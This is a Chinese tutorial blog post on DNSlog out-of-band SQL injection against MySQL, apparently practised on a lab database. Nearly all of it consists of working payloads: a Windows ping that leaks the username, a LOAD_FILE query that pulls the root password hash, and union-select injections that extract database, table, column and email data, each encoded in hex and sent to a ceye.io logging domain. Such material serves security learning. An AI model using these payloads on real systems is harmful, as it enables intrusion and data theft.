当前位置:网站首页>DNSlog外带数据注入
DNSlog外带数据注入
2022-08-05 06:06:00 【树迷了路】
DNSlog
DNS log即DNS日志,域名解析的记录
外带原理
测试平台利用泛解析机制解析域名,并在解析我们构造的子域名时记录,生成日志,只要有解析就数据,我们查看日志即可获取关键数据
MySQL条件
配置文件 mysql.ini 中 secure_file_priv 参数需为空
mysql> show variables like '%secu%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)
CEYE
测试网站
windows
ping %USERNAME%.b182oj.ceye.io
b1820j 换成网站分配的
SQL Injection
MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
load_file 是MySQL读文件的 函数 ;
\\\\——>\\
编码绕过
有些特殊字符在网站中是不合规代码,如user() 中的 @ ;
转十六进制即可;
如下实际为构造域名:\\user().aueuhs.ceye.io\\abc
?id=-1' union select 1,load_file(concat('\\\\',hex(user()),'.aueuhs.ceye.io\\abc')),3--+
726F6F74406C6F63616C686F7374 |
查数据库
?id=-1' union select 1,load_file(concat('\\\\',database(),'.aueuhs.ceye.io\\abc')),3--+
CEYE以将数据带入;
查表
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(table_name) from information_schema.tables where table_schema="security")),'.aueuhs.ceye.io\\abc')),3--+
656D61696C732C72656665726572732C756167656E74732C7573657273 |
查字段名
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="emails")),'.aueuhs.ceye.io\\abc')),3--+
69642C656D61696C5F6964 |
查数据
?id=-1' union select 1,load_file(concat('\\\\',hex((select concat(id,0x3e,email_id) from security.emails limit 0,1)),'.aueuhs.ceye.io\\abc')),3--+
313E44756D62406468616B6B616E2E636F6D |
边栏推荐
- Pytorch distributed parallel processing
- 淘宝客APP带自营商城本地生活CPS外卖优惠电影票话费更新渠道跟单生活特权V3
- After docker is deployed, mysql cannot connect
- Matplotlib plotting notes
- 武田公司2022财年第一季度业绩强劲;正稳步实现全年的管理层指引目标
- Some basic method records of commonly used languages in LeetCode
- 文件内音频的时长统计并生成csv文件
- LaTeX使用frame制作PPT图片没有标号
- MySQL的主从模式搭建
- NACOS配置中心设置配置文件
猜你喜欢
numpy.random usage documentation
合工大苍穹战队视觉组培训Day9——相机标定
Get the network input dimensions of the pretrained model
农场游戏果园系统+牧场养殖系统+广告联盟模式流量主游戏小程序APP V1
typescript68-索引查询类型(查询多个)
《PyTorch深度学习实践》第十课(卷积神经网络CNN)
2022杭电多校六 1007-Shinobu loves trip(同余方程)
typescript66-分析partial的实现
NB-IOT智能云家具项目系列实站
利用将网页项目部署到阿里云上(ngnix)
随机推荐
技术分析模式(十一)如何交易头肩形态
2022杭电多校六 1007-Shinobu loves trip(同余方程)
Linux中安装Redis教程
Get the network input dimensions of the pretrained model
矩阵的构造
八大排序之堆排序
HelloWorld
无法导入torchvision.io.read_image
export使用
17-VMware Horizon 2203 虚拟桌面-Win10 手动桌面池浮动(十七)
typescript64-映射类型
2022杭电多校六 1006-Maex (树形DP)
Redis进阶
scikit-image image processing notes
香港国际珠宝展及香港国际钻石、宝石及珍珠展揭幕
数据库多表关联插入数据
Email management Filter emails
农场游戏果园系统+牧场养殖系统+广告联盟模式流量主游戏小程序APP V1
LaTeX Notes
小程序input框不允许输入负数